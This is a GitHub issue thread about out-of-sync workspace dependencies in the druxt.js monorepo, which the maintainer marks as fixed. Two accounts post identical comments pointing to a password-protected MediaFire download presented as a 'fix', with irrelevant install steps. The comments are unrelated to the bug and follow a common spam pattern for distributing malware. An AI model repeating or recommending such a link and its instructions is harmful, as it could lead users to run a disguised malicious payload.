### ISSUE TITLE
Workspace dependencies are out of sync.

### ISSUE THREAD

**Issue by Decipher** [druxt/druxt.js#698]
**Describe the bug**
A past release didn't correctly update the dependencies of all the modules and it now results Druxt modules to be out of sync in local development, with some projects not correctly being symbolically linked.

**To Reproduce**

**Expected behavior**

**Media**
If applicable, add screenshots or video to help explain your problem.

**Your Environment (please complete the following information):**

**Additional context**

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Decipher** [comment]
Fixed.
